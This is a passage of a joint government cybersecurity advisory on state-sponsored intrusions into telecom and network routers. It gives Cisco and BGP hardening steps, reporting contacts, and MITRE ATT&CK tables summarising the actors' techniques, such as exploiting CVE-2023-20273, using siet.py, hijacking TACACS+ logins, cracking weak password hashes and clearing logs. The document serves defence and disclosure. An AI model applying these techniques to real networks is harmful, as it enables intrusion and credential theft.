<li>Continuously validate static routes, policy-based routing (PBR), and VRF-leak policies at peering edges. Alert on additions that steer traffic toward non-standard GRE/IPsec endpoints or unexpected next hops.</li>
</ul>
</li>
<li>Enforce maximum-prefix limits, strict prefix/AS-path filtering, and “only-expected” communities on all external BGP (eBGP) sessions. Deny default and overly broad routes.</li>
<li>Enable TTL security (GTSM) or equivalent for eBGP to reduce off-path attack surface.</li>
<li>Require session protection (TCP-AO where supported, otherwise MD5) and monitor for BGP session resets and parameter changes from unexpected management origins.</li>
</ul>
<h3>Virtual Private Network (VPN) best practices</h3>
<ul>
<li>Delete default VPN Internet Key Exchange (IKE) policies and associated components.</li>
<li>Create IKE policies consistent with applicable requirements and guidance on cryptographic algorithm use. For U.S. National Security Systems, follow <a href="https://www.cnss.gov/CNSS/issuances/Policies.cfm" target="_blank" title="Committee on National Security Systems Policy (CNSSP) 15">Committee on National Security Systems Policy (CNSSP) 15</a> and other applicable policies:
<ul>
<li>Diffie-Hellman Group: 16 with 4096 bit Modular Exponential (MODP)</li>
<li>Diffie-Hellman Group: 20 with 384 bit Elliptic Curve Group (ECP)</li>
<li>Encryption: AES-256</li>
<li>Hashing: SHA-384&nbsp;</li>
</ul>
</li>
</ul>
<h3>Cisco-specific recommendations</h3>
<ul>
<li>Disable the Cisco Smart Install feature.</li>
<li>Store credentials using strong cryptography.
<ul>
<li>Protect local credentials on Cisco networking devices using Type 8 (PBKDF2-SHA-256) where supported. Do not use Type 7 and transition from Type 5 (MD5) when possible.</li>
<li>Use Type 6 (AES) key encryption to protect stored secrets (e.g., TACACS+/RADIUS shared secrets or IKE PSKs).</li>
</ul>
</li>
<li>Disable outbound connections from the VTYs (e.g., <code>transport output none</code>). This prevents initiating SSH, Telnet, or other client sessions from the device via VTY, reducing its utility as a jump host. Monitor for any changes to this setting.</li>
<li>Audit for unexpected enablement of IOS XR host SSH (<code>sshd_operns</code>) on TCP/57722. This is disabled by default, but has been observed being enabled by actors for persistence.</li>
<li>When not required, disable the web configuration interface on applicable Cisco networking devices by running <code>no ip http server </code>and <code>no ip http secure-server</code>.
<ul>
<li>If management via a web interface is required, ensure to enable only the HTTPS management interface by running the command<code> ip http secure-server</code> and keep <code>no ip http server</code> configured to prevent unencrypted access via HTTP.</li>
</ul>
</li>
<li>Ensure a final <code>deny any any log</code> line is added to all configured ACLs. This ensures that the denied connections are logged so they could be reviewed at a later date.</li>
</ul>
<h4><strong>Mitigating Guest Shell abuse</strong></h4>
<ul>
<li>Disable Guest Shell where not operationally required.
<ul>
<li>For IOS XE, run <code>guestshell disable</code> to stop the container. Where supported, disable the IOx subsystem with <code>no iox</code> to prevent container hosting entirely. Confirm with <code>show guestshell / show iox</code>.</li>
<li>For NX-OS, run <code>guestshell disable</code> to stop the container. Use <code>guestshell destroy</code> to uninstall it and return resources to the system. Confirm with <code>show guestshell</code>.</li>
</ul>
</li>
<li>Where Guest Shell is disabled, restrict (re)enabling Guest Shell.
<ul>
<li>Enforce AAA command authorization (TACACS+/RADIUS) so only approved roles can run <code>guestshell enable</code>, <code>guestshell run bash</code> (IOS XE), <code>run guestshell</code> (NX-OS), <code>guestshell disable/destroy</code>, <code>chvrf</code>, <code>dohost</code>, or IOx-related commands.</li>
</ul>
</li>
<li>Where Guest Shell is used:
<ul>
<li>Forward container logs (e.g., journald/systemd inside Guest Shell) to your SIEM. Device syslog does not capture process activity inside the container by default.</li>
<li>Configure the VRF used by Guest Shell (management VRF on IOS XE; default VRF on NX-OS unless <code>chvrf</code> is used). Restrict egress to only required destinations (e.g., SIEM/AAA/telemetry collectors) with ACLs.</li>
<li>Perform periodic inventories and integrity checks of device storage (e.g., <code>bootflash:</code>) to detect unexpected files created from the container.</li>
<li>Create alerts for <code>guestshell disable</code> <code>/ guestshell destroy</code> and unexpected <code>chvrf</code> / <code>dohost</code> usage. Consider Cisco Embedded Event Manager (EEM) policies that snapshot state (running processes, container filesystem, storage listings) when these events occur.</li>
</ul>
</li>
</ul>
<p>Additional Cisco resources:</p>
<ul>
<li><a href="https://sec.cloudapps.cisco.com/security/center/softwarechecker.x" target="_blank" title="Cisco Software Checker">Cisco Software Checker</a>: Resource to find if any known vulnerabilities affect a version of IOS that may be currently in use.</li>
<li><a href="https://www.cisco.com/c/en/us/support/docs/ip/access-lists/13608-21.html" target="_blank" title="Cisco IOS Hardening Guide">Cisco IOS Hardening Guide</a>: Resource for IOS devices.</li>
<li><a href="https://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/ios-xe-16/220270-use-cisco-ios-xe-hardening-guide.html" target="_blank" title="Cisco IOS XE Hardening Guide">Cisco IOS XE Hardening Guide</a>: Resource for IOS XE devices.</li>
<li><a href="https://sec.cloudapps.cisco.com/security/center/tacticalresources.x#%7ERespondingtoaSecurityIncident" target="_blank" title="Cisco Forensic Guides">Cisco Forensic Guides</a>: Resources to verify the integrity of affected devices.</li>
<li><a href="https://sec.cloudapps.cisco.com/security/center/resources/securing_nx_os.html" target="_blank" title="Guide to Securing NX-OS Software Devices">Guide to Securing NX-OS Software Devices</a>: Resource if using applicable devices.</li>
</ul>
<h2><strong>Resources</strong></h2>
<p>Additional information can be found in the following publicly available guidance.</p>
<p><strong>United States resources</strong></p>
<ul>
<li>(NSA, CISA, FBI)&nbsp;<a href="https://media.defense.gov/2022/Jun/07/2003013376/-1/-1/0/CSA_PRC_SPONSORED_CYBER_ACTORS_EXPLOIT_NETWORK_PROVIDERS_DEVICES_TLPWHITE.PDF" target="_blank" title="PRC State-Sponsored Cyber Actors Exploit Network Providers and Devices">PRC State-Sponsored Cyber Actors Exploit Network Providers and Devices</a> (<strong>Note:</strong> The Telecommunications and Network Service Provider Targeting section begins on page 4. Those TTPs, router commands, and mitigations are relevant for the activity listed in this advisory.)</li>
<li>(CISA, NSA, FBI)&nbsp;<a href="https://www.cisa.gov/sites/default/files/2025-01/joint-guidance-enhanced-visibility-hardening-guide-for-comms-infrastructure-508c_0.pdf" title="Enhanced Visibility and Hardening Guidance for Communications Infrastructure">Enhanced Visibility and Hardening Guidance for Communications Infrastructure</a></li>
<li>(NSA)&nbsp;<a href="https://media.defense.gov/2022/Feb/17/2002940795/-1/-1/1/CSI_CISCO_PASSWORD_TYPES_BEST_PRACTICES_20220217.PDF" target="_blank" title="Cisco Password Types: Best Practices ">Cisco Password Types: Best Practices</a></li>
<li>(NSA)&nbsp;<a href="https://media.defense.gov/2019/Jul/16/2002157833/-1/-1/0/CSA-CISCO-SMART-INSTALL-PROTOCOL-MISUSE.PDF" target="_blank" title="Cisco Smart Install Protocol Misuse">Cisco Smart Install Protocol Misuse</a></li>
<li>(NSA)&nbsp;<a href="https://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT20200911.PDF" target="_blank" title="&nbsp;Performing Out-of-Band Network Management">Performing Out-of-Band Network Management</a></li>
<li>(NSA)&nbsp;<a href="https://media.defense.gov/2022/Jun/15/2003018261/-1/-1/0/CTR_NSA_NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20220615.PDF" target="_blank" title="Network Infrastructure Security Guide">Network Infrastructure Security Guide</a></li>
<li>(CISA)&nbsp;<a href="https://www.cisa.gov/sites/default/files/2024-12/guidance-mobile-communications-best-practices.pdf" title="Mobile Communications Best Practice Guidance">Mobile Communications Best Practice Guidance</a></li>
</ul>
<p><strong>United Kingdom resources</strong></p>
<ul>
<li>(Legislation) <a href="https://www.legislation.gov.uk/ukpga/2021/31/contents" target="_blank" title="Telecommunications Security Act (2021) ">Telecommunications Security Act (2021)</a></li>
<li>(Technical Guidance) <a href="https://assets.publishing.service.gov.uk/media/6384d09ed3bf7f7eba1f286c/E02781980_Telecommunications_Security_CoP_Accessible.pdf" target="_blank" title=" Telecommunications Security Act (2021) Code of Practice">Telecommunications Security Act (2021) Code of Practice</a></li>
<li>(NCSC Guidance) <a href="https://www.ncsc.gov.uk/collection/cyber-assessment-framework" target="_blank" title="Cyber Assessment Framework ">Cyber Assessment Framework</a></li>
<li>(NCSC Guidance) <a href="https://www.ncsc.gov.uk/guidance/using-ipsec-protect-data" target="_blank" title="Guidance on using IPsec to protect data">Guidance on using IPsec to protect data</a></li>
<li>(NCSC Guidance) <a href="https://www.ncsc.gov.uk/collection/principles-for-secure-paws" target="_blank" title="Principles for secure privileged access workstations (PAWS) ">Principles for secure privileged access workstations (PAWS)</a></li>
<li>(Ofcom Guidance) <a href="https://www.ofcom.org.uk/phones-and-broadband/telecoms-infrastructure/telecoms-industry-guidance" target="_blank" title="Telecoms industry guidance">Telecoms industry guidance</a>&nbsp;</li>
</ul>
<p><strong>International resources</strong></p>
<ul>
<li>(Technical Specification) <a href="https://www.etsi.org/deliver/etsi_ts/103900_103999/10399401/01.01.01_60/ts_10399401v010101p.pdf" target="_blank" title=" ETSI Privileged Access Workstations: Part 1: Physical">ETSI Privileged Access Workstations: Part 1: Physical [TS 103 994-1]</a></li>
<li>(Technical Specification) <a href="https://www.etsi.org/deliver/etsi_ts/103900_103999/10399402/01.01.01_60/ts_10399402v010101p.pdf" target="_blank" title="ETSI Privileged Access Workstations: Part 2: Connectivity">ETSI Privileged Access Workstations: Part 2: Connectivity [TS 103 994-2]</a></li>
</ul>
<h2><strong>Acknowledgements</strong></h2>
<p>The NSA Cybersecurity Collaboration Center, along with the authoring agencies, acknowledge Amazon Web Services (AWS) Security, Cisco Security &amp; Trust, Cisco Talos, Crowdstrike, Google Mandiant, Google Threat Intelligence, Greynoise, Microsoft, PwC Threat Intelligence, and additional industry partners for their contribution to this advisory.</p>
<h2><strong>Disclaimer of endorsement</strong></h2>
<p>The information and opinions contained in this document are provided &#8220;as is&#8221; and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the authoring agencies, and this guidance shall not be used for advertising or product endorsement purposes.</p>
<h2><strong>Purpose</strong></h2>
<p>This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.</p>
<h2><a class="ck-anchor" id="Contactinfo"><strong>Contact information</strong></a></h2>
<p>The following contacts are non-exhaustive, and organizations should follow all applicable reporting requirements for a given incident or other event.</p>
<p><strong>United States organizations</strong></p>
<ul>
<li><strong>National Security Agency (NSA)</strong>
<ul>
<li>Cybersecurity Report Feedback:&nbsp;<a href="mailto:CybersecurityReports@nsa.gov" target="_blank" title="CybersecurityReports@nsa.gov">CybersecurityReports@nsa.gov</a></li>
<li>Defense Industrial Base Inquiries and Cybersecurity Services:&nbsp;<a href="mailto:DIB_Defense@cyber.nsa.gov" target="_blank" title="DIB_Defense@cyber.nsa.gov">DIB_Defense@cyber.nsa.gov</a></li>
<li>Media Inquiries / Press Desk: NSA Media Relations: 443-634-0721,&nbsp;<a href="mailto:MediaRelations@nsa.gov" target="_blank" title="MediaRelations@nsa.gov">MediaRelations@nsa.gov</a></li>
</ul>
</li>
<li><strong>Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI)</strong>
<ul>
<li>U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to CISA via the agency’s&nbsp;<a href="https://myservices.cisa.gov/irf" title="Incident Reporting System">Incident Reporting System</a>, its 24/7 Operations Center (<a href="mailto:contact@mail.cisa.dhs.gov" target="_blank" title="contact@mail.cisa.dhs.gov">contact@mail.cisa.dhs.gov</a>, 888-282-0870, or&nbsp;reporting online at&nbsp;<a href="https://www.cisa.gov/report" target="_blank" title="report">cisa.gov/report</a>), or your&nbsp;<a href="https://www.fbi.gov/contact-us/field-offices" target="_blank" title="Local FBI Office">local FBI field office</a>.</li>
<li>Methods for initial access are a critical information gap for parties working to understand the scope, scale, and impact of these APT actors.&nbsp;When available, please include the following information regarding the incident:
<ul>
<li>Type of activity and types of equipment affected by or used in the activity;</li>
<li>APT actors’ tactics, techniques, and procedures (TTPs) used to conduct initial access and/or lateral movement;</li>
<li>Exfiltration infrastructure and associated techniques (Layer 2/Layer 3);</li>
<li>Passwords and associated techniques used to encrypt exfiltrated data;</li>
<li>Likely or confirmed compromised routing equipment connected to or used by government networks;</li>
<li>Insights into how the compromised devices are tasked (i.e., how is traffic of interest selected for collection/redirection);</li>
<li>Signs of compromise or persistence beyond the specific network devices themselves (e.g., additional targets, such as network operations staff, IT/corporate email, etc.).</li>
<li>Date, time, and location of the incident;</li>
<li>Number of people affected;</li>
<li>Name of the submitting company or organization; and</li>
<li>Designated point of contact.</li>
</ul>
</li>
</ul>
</li>
<li><strong>Department of Defense Cyber Crime Center (DC3)</strong>
<ul>
<li>Defense Industrial Base Inquiries and Cybersecurity Services:&nbsp;<a href="mailto:DC3.DCISE@us.af.mil" target="_blank" title="&nbsp;DC3.DCISE@us.af.mil">DC3.DCISE@us.af.mil</a></li>
<li>Media Inquiries / Press Desk:&nbsp;<a href="mailto:DC3.Information@us.af.mil" target="_blank" title="DC3.Information@us.af.mil">DC3.Information@us.af.mil</a></li>
</ul>
</li>
</ul>
<p><strong>Australian organizations</strong></p>
<ul>
<li>Visit <a href="https://www.cyber.gov.au/" target="_blank" title="cyber.gov.au">cyber.gov.au</a> or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.</li>
</ul>
<p><strong>Canadian organizations</strong></p>
<ul>
<li>Report incidents by emailing CCCS at&nbsp;<a href="mailto:contact@cyber.gc.ca" target="_blank" title="contact@cyber.gc.ca">contact@cyber.gc.ca</a>.</li>
<li>Canadian Security Intelligence Service (CSIS) Media Inquiries / Press Desk:&nbsp;<a href="mailto:media-medias@smtp.gc.ca" target="_blank" title="media-medias@smtp.gc.ca">media-medias@smtp.gc.ca</a>&nbsp;</li>
</ul>
<p><strong>New Zealand organizations</strong></p>
<ul>
<li>New Zealand National Cyber Security Centre (NCSC-NZ):&nbsp;<a href="mailto:info@ncsc.govt.nz" target="_blank" title="info@ncsc.govt.nz">info@ncsc.govt.nz</a>.</li>
</ul>
<p><strong>United Kingdom organizations</strong></p>
<ul>
<li><strong>UK National Cyber Security Centre (NCSC)</strong>
<ul>
<li>The NCSC—a part of intelligence, security, and cyber agency GCHQ—is the UK’s technical authority on cyber security. UK organizations should report significant cyber security incidents via&nbsp;<a href="https://report.ncsc.gov.uk/" target="_blank" title="https://report.ncsc.gov.uk">https://report.ncsc.gov.uk/</a> (monitored 24/7).</li>
</ul>
</li>
<li><strong>Ofcom</strong>
<ul>
<li>Ofcom is the UK’s communications regulator and is responsible for enforcing the telecoms security provisions in the Communications Act (2003) and the Telecommunications Security Act (2021). Guidance and contact information on standards, specifications, and other requirements for the UK telecoms industry can be found at&nbsp;<a href="https://www.ofcom.org.uk" target="_blank" title="&nbsp;https://www.ofcom.org.uk">https://www.ofcom.org.uk</a>.</li>
<li>For general inquiries:&nbsp;<a href="mailto:networksecurityenquiries@ofcom.org.uk" target="_blank" title="networksecurityenquiries@ofcom.org.uk">networksecurityenquiries@ofcom.org.uk</a></li>
<li>For incident reports:&nbsp;<a href="mailto:incident@ofcom.org.uk" target="_blank" title="incident@ofcom.org.uk">incident@ofcom.org.uk</a>&nbsp;</li>
</ul>
</li>
</ul>
<p><strong>Czech Republic organizations</strong></p>
<ul>
<li>National Cyber and Information Security Agency (NÚKIB):&nbsp;<a href="mailto:cert.incident@nukib.gov.cz" target="_blank" title="cert.incident@nukib.gov.cz">cert.incident@nukib.gov.cz</a>.</li>
</ul>
<p><strong>Finnish organizations</strong></p>
<ul>
<li>Finnish Security and Intelligence Service (SUPO):&nbsp;<a href="https://supo.fi/en/contact" target="_blank" title="Finnish Security and Intelligence Service (SUPO) Contact">https://supo.fi/en/contact</a>&nbsp;</li>
</ul>
<p><strong>Germany organizations</strong></p>
<ul>
<li>Bundesnachrichtendienst (BND): Media Relations / Press Desk: +49 30 20 45 36 30,&nbsp;<a href="mailto:pressestelle@bnd.bund.de" target="_blank" title="pressestelle@bnd.bund.de">pressestelle@bnd.bund.de</a></li>
<li>BfV Prevention/Economic Protection Unit: +49 30 18792-3322,&nbsp;<a href="mailto:wirtschaftsschutz@bfv.bund.de" target="_blank" title="&nbsp;wirtschaftsschutz@bfv.bund.de">wirtschaftsschutz@bfv.bund.de</a></li>
<li>BSI Service-Center: +49 800 274 1000,&nbsp;<a href="mailto:service-center@bsi.bund.de" target="_blank" title="service-center@bsi.bund.de">service-center@bsi.bund.de</a></li>
</ul>
<p><strong>Italian organizations</strong>&nbsp;</p>
<ul>
<li>Italian External Intelligence and Security Agency (AISE):&nbsp;Visit&nbsp;<a href="https://www.sicurezzanazionale.gov.it/chi-siamo/organizzazione/aise" target="_blank" title="Italian External Intelligence and Security Agency (AISE)">https://www.sicurezzanazionale.gov.it/chi-siamo/organizzazione/aise</a>.</li>
<li>Italian Internal Intelligence and Security Agency (AISI):&nbsp;Visit&nbsp;<a href="https://www.sicurezzanazionale.gov.it/chi-siamo/organizzazione/aisi" target="_blank" title="Italian Internal Intelligence and Security Agency (AISI">https://www.sicurezzanazionale.gov.it/chi-siamo/organizzazione/aisi</a>.</li>
</ul>
<p><strong>Japanese organizations</strong></p>
<ul>
<li>National Cybersecurity Office (NCO): <a href="mailto:first-team@cyber.go.jp" target="_blank" title="first-team@cyber.go.jp">first-team@cyber.go.jp</a></li>
</ul>
<p><strong>Polish organizations</strong></p>
<ul>
<li>Polish Foreign Intelligence Agency (AW):&nbsp;<a href="mailto:CTIteam@aw.gov.pl" target="_blank" title="CTIteam@aw.gov.pl">CTIteam@aw.gov.pl</a></li>
<li>Polish Military Counterintelligence Service (SKW):&nbsp;<a href="mailto:cyber.int@skw.gov.pl" target="_blank" title="cyber.int@skw.gov.pl">cyber.int@skw.gov.pl</a></li>
</ul>
<h2><a class="ck-anchor" id="AppA"><strong>Appendix A: MITRE ATT&amp;CK tactics and techniques</strong></a></h2>
<p>See <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a#Table8" title="Table 8"><strong>Table 8</strong></a><strong> </strong>through <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a#Table20" title="Table 20"><strong>Table 20</strong></a><strong> </strong>for all the threat actor tactics and techniques referenced in this advisory.</p>
<table class="tablesaw tablesaw-stack">
<caption><a class="ck-anchor" id="Table8"><strong>Table 8</strong></a>: Reconnaissance</caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Active Scanning</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1595/" target="_blank" title="T1595">T1595</a></td>
<td>Actively scan for open ports and services</td>
</tr>
<tr>
<td>Gather Victim Network Information: Network Topology</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1590/004/" target="_blank" title="T1590.004">T1590.004</a></td>
<td>Leverage configuration files from exploited devices to gather the network topology information</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption><strong>Table 9</strong>: Resource Development</caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Acquire Infrastructure: Virtual Private Servers</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1583/003/" target="_blank" title="T1583.003">T1583.003</a></td>
<td>Leverage VPS as infrastructure</td>
</tr>
<tr>
<td>Compromise Infrastructure: Network Devices</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1584/008/" target="_blank" title="T1584.008">T1584.008</a></td>
<td>Compromise intermediate routers</td>
</tr>
<tr>
<td>Obtain Capabilities: Exploits</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1588/005/" target="_blank" title="T1588.005">T1588.005</a></td>
<td>Utilize publicly available code (siet.py) to exploit vulnerable devices&nbsp;</td>
</tr>
<tr>
<td>Obtain Capabilities: Tool</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1588/002/" target="_blank" title="T1588.002">T1588.002</a></td>
<td>Utilize publicly available tooling (e.g., map.tcl, tclproxy.tcl, wodSSHServer)&nbsp;</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption><strong>Table 10</strong>: Initial Access</caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Exploit Public-Facing Application</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1190/" target="_blank" title="T1190">T1190</a></td>
<td>Exploit publicly known CVEs&nbsp;</td>
</tr>
<tr>
<td>Trusted Relationship</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1199/" target="_blank" title="T1199">T1199</a></td>
<td>Leverage trusted connections between providers to pivot between networks</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption><strong>Table 11</strong>: Execution</caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>System Services</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1569/" target="_blank" title="T1569">T1569</a></td>
<td>Executing commands via SNMP</td>
</tr>
<tr>
<td>Container Administration Command</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1609/" target="_blank" title="T1609">T1609</a></td>
<td>Use Guest Shell to load open-source tools and as a jump point for reconnaissance and follow-on actions in the environment</td>
</tr>
<tr>
<td>Command and Scripting Interpreter: Python</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1059/006/" target="_blank" title="T1059.006">T1059.006</a></td>
<td>Use Python script siet.py&nbsp;</td>
</tr>
<tr>
<td>Command and Scripting Interpreter: Network Device CLI</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1059/008/" target="_blank" title="T1059.008">T1059.008</a></td>
<td>Use built-in CLI on network devices to execute native commands</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption><strong>Table 12</strong>: Persistence</caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Create Account: Local Account</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1136/001/" target="_blank" title="T1136.001">T1136.001</a></td>
<td>Create new local users on network devices for persistence</td>
</tr>
<tr>
<td>Container Service</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1543/005/" target="_blank" title="T1543.005">T1543.005</a></td>
<td>Leverage Linux-based Guest Shell containers, natively supported in a variety of Cisco OS software</td>
</tr>
<tr>
<td>Account Manipulation: SSH Authorized Keys</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1098/004/" target="_blank" title="T1098.004">T1098.004</a></td>
<td>Regain entry into environments via SSH into network devices</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption><strong>Table 13</strong>: Privilege Escalation</caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Exploitation for Privilege Escalation</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1068/" target="_blank" title="T1068">T1068</a></td>
<td>Exploit CVE-2023-20273 to gain root-level user privileges</td>
</tr>
<tr>
<td>Brute Force: Password Cracking</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1110/002/" target="_blank" title="T1110.002">T1110.002</a></td>
<td>Brute force passwords with weak encryption in obtained configuration files</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption><strong>Table 14</strong>: Defense Evasion</caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Obfuscated Files or Information: Command Obfuscation</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1027/010/" target="_blank" title="T1027.010">T1027.010</a></td>
<td>Obfuscate paths with “double encoding”</td>
</tr>
<tr>
<td>Obfuscated Files or Information</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1027/" target="_blank" title="T1027">T1027</a></td>
<td>Obfuscate source IP addresses in system logs, as actions may be recorded as originating from local IP addresses&nbsp;</td>
</tr>
<tr>
<td>Impair Defenses: Disable or Modify System Firewall</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1562/004/" target="_blank" title="T1562.004">T1562.004</a></td>
<td>Modify ACLs, adding IP addresses to bypass security policies and permit traffic from a threat actor-controlled IP address</td>
</tr>
<tr>
<td>Deploy Container</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1610/" target="_blank" title="T1610">T1610</a></td>
<td>Deploy virtual container (e.g., Guest Shell) on network infrastructure to persist and evade monitoring services</td>
</tr>
<tr>
<td>Indicator Removal</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1070/" target="_blank" title="T1070">T1070</a></td>
<td>Delete and/or clear logs</td>
</tr>
<tr>
<td>Indicator Removal: Clear Persistence</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1070/009/" target="_blank" title="T1070.009">T1070.009</a></td>
<td>Use Guest Shell destroy command to deactivate and uninstall Guest Shell container and return all resources to the system</td>
</tr>
<tr>
<td>Network Boundary Bridging</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1599/" target="_blank" title="T1599">T1599</a></td>
<td>Abuse peering connections&nbsp;</td>
</tr>
</tbody>
</table>
<br />
<table class="tablesaw tablesaw-stack">
<caption><strong>Table 15</strong>: Credential Access</caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Network Sniffing</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1040/" target="_blank" title="T1040">T1040</a></td>
<td>Passively collect packet capture (PCAP) from networks for configurations and credentials</td>
</tr>
<tr>
<td>Modify Authentication Process</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1556/" target="_blank" title="T1556">T1556</a></td>
<td>Modify a router’s TACACS+ server configuration to point to an APT actor-controlled IP address to capture authentication attempts or modify AAA configurations to use less secure authentication methods</td>
</tr>
<tr>
<td>OS Credential Dumping</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1003/" target="_blank" title="T1003">T1003</a></td>
<td>Collect router configuration with weak Cisco Type 7 passwords</td>
</tr>
<tr>
<td>Brute Force: Password Cracking</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1110/002/" target="_blank" title="T1110.002">T1110.002</a></td>
<td>Brute force weak hashed Cisco Type 5 password</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption><strong>Table 16</strong>: Discovery</caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>System Information Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1082/" target="_blank" title="T1082">T1082</a></td>
<td>Leverage CLI on network devices to gather system information</td>
</tr>
<tr>
<td>System Network Configuration Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1016/" target="_blank" title="T1016">T1016</a></td>
<td>Enumerate interfaces/VRFs/routing/ACLs and related network settings from the device CLI/SNMP</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption><strong>Table 17</strong>: Lateral Movement</caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Remote Services</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1021/" target="_blank" title="T1021">T1021</a></td>
<td>Enumerate and alter the SNMP configurations for other devices in the same community group</td>
</tr>
<tr>
<td>Remote Services: SSH</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1021/004/" target="_blank" title="T1021.004">T1021.004</a></td>
<td>Enable SSH servers and open external-facing ports on network devices to maintain encrypted remote access</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption><strong>Table 18</strong>: Collection</caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Archive Collected Data</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1560/" target="_blank" title="T1560">T1560</a></td>
<td>Compile configurations and packet captures</td>
</tr>
<tr>
<td>Data from Configuration Repository: SNMP (MIB Dump)</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1602/001/" target="_blank" title="T1602.001">T1602.001</a></td>
<td>Target MIB to collect network information via SNMP</td>
</tr>
<tr>
<td>Data from Configuration Repository: Network Device Configuration Dump</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1602/002/" target="_blank" title="T1602.002">T1602.002</a></td>
<td>Acquire credentials by collecting network device configurations</td>
</tr>
<tr>
<td>Data from Local System</td>
